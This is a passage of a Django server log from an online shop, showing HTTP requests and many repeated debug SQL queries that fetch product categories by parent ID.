HTTP/1.0" 302 0 [03/Jan/2020 16:30:12] "GET / HTTP/1.0" 302 0 [03/Jan/2020 16:35:15] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-03 16:35:58,752 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:35:58,761 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:35:58,766 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:35:58,770 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 16:35:58,774 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:35:58,777 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:35:58,779 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:35:58,781 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:35:58,785 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:35:58,790 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:35:58,795 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:35:58,800 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:35:58,804 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:35:58,807 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:35:58,813 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:35:58,818 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:35:58,821 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:35:58,825 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:35:58,829 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:35:58,836 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:35:58,842 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2020-01-03 16:35:58,845 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2020-01-03 16:35:58,849 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2020-01-03 16:35:58,853 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2020-01-03 16:35:58,856 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2020-01-03 16:35:58,862 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2020-01-03 16:35:58,865 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2020-01-03 16:35:58,868 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2020-01-03 16:35:58,872 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2020-01-03 16:35:58,875 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2020-01-03 16:35:58,881 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2020-01-03 16:35:58,884 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2020-01-03 16:35:58,888 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2020-01-03 16:35:58,891 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2020-01-03 16:35:58,896 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2020-01-03 16:35:58,903 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2020-01-03 16:35:58,907 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2020-01-03 16:35:58,911 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2020-01-03 16:35:58,914 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2020-01-03 16:35:58,916 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2020-01-03 16:35:58,919 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2020-01-03 16:35:58,922 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2020-01-03 16:35:58,924 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2020-01-03 16:35:58,926 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2020-01-03 16:35:58,929 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2020-01-03 16:35:58,931 utils 27361 140408453592832 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [03/Jan/2020 16:35:58] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [03/Jan/2020 16:35:59] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [03/Jan/2020 16:35:59] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 DEBUG 2020-01-03 16:36:45,652 utils 27361 140408453592832 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2020-01-03 16:36:45,663 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2020-01-03 16:36:45,669 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2020-01-03 16:36:45,674 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2020-01-03 16:36:45,681 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2020-01-03 16:36:45,685 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2020-01-03 16:36:45,690 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2020-01-03 16:36:45,694 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2020-01-03 16:36:45,697 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2020-01-03 16:36:45,703 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2020-01-03 16:36:45,707 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2020-01-03 16:36:45,711 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2020-01-03 16:36:45,715 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2020-01-03 16:36:45,719 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2020-01-03 16:36:45,725 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2020-01-03 16:36:45,729 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2020-01-03 16:36:45,733 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2020-01-03 16:36:45,737 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2020-01-03 16:36:45,741 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2020-01-03 16:36:45,748 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2020-01-03 16:36:45,752 utils 27361 140408453592832 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" 